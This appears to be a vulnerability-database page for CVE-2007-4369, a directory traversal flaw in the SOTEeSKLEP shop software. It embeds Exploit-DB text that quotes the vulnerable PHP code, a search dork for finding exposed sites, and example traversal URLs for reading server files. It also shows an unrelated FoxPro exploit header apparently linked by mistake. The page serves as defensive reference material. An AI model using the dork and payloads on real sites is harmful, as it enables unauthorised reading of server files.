CVE-2007-4369
published 2007-08-15CVE-2007-4369: Directory traversal vulnerability in go/_files in SOTEeSKLEP before 4.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the file…
PriorityP430medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.49%
87.7th percentile
Directory traversal vulnerability in go/_files in SOTEeSKLEP before 4.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sote | soteesklep | — | — |
| sote | soteesklep | — | — |
| sote | soteesklep | — | — |
| sote | soteesklep | — | — |
| sote | soteesklep | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution
exploitdb·2007-10-09
CVE-2007-5322 Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution
Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution
---
Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution
url: http://www.microsoft.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Technical Details
File: FPOLE.OCX
Version: 6.0.8450.0
MD5: E9A1D8CFE6C791BA76B7343FA39752FB
Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
When I released this http://www.milw0rm.com/exploits/4369 I never thought
it was possible to use the "FoxDoCmd()"
Exploit-DB
SOTEeSKLEP 3.5RC9 - 'file' Remote File Disclosure
exploitdb·2007-08-13
CVE-2007-4369 SOTEeSKLEP 3.5RC9 - 'file' Remote File Disclosure
SOTEeSKLEP 3.5RC9 - 'file' Remote File Disclosure
---
SOTEeSKLEP Remote File Disclosure Vulnerability
Script : SOTEeSKLEP
Versions: 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC9, and i think other.
Site : http://www.sote.pl
Bug:
...
if (! empty($_REQUEST["file"])) { $file=$_REQUEST['file']; }
...
$file_path="$DOCUMENT_ROOT/themes/_$config->lang/_html_files/$file";
if (file_exists($file_path)) { $fd=fopen($file_path,"r");
$data=fread($fd,filesize($file_path));
print $data;
fclose($fd);
}
...
Dork: inurl:"/go/_files/?file="
Examples:
http://???/go/_files/?file=./.././.././.././
http://???/go/_files/?file=./.././.././.././go/_files/index.php
Discovered by dun
2007.08.11
# milw0rm.com [2007-08-13]
No writeups or analysis indexed.
http://secunia.com/advisories/26472http://www.securityfocus.com/archive/1/476268/100/0/threadedhttp://www.securityfocus.com/archive/1/476445/100/0/threadedhttp://www.securityfocus.com/bid/25286https://exchange.xforce.ibmcloud.com/vulnerabilities/35973https://www.exploit-db.com/exploits/4282http://secunia.com/advisories/26472http://www.securityfocus.com/archive/1/476268/100/0/threadedhttp://www.securityfocus.com/archive/1/476445/100/0/threadedhttp://www.securityfocus.com/bid/25286https://exchange.xforce.ibmcloud.com/vulnerabilities/35973https://www.exploit-db.com/exploits/4282
2007-08-15
Published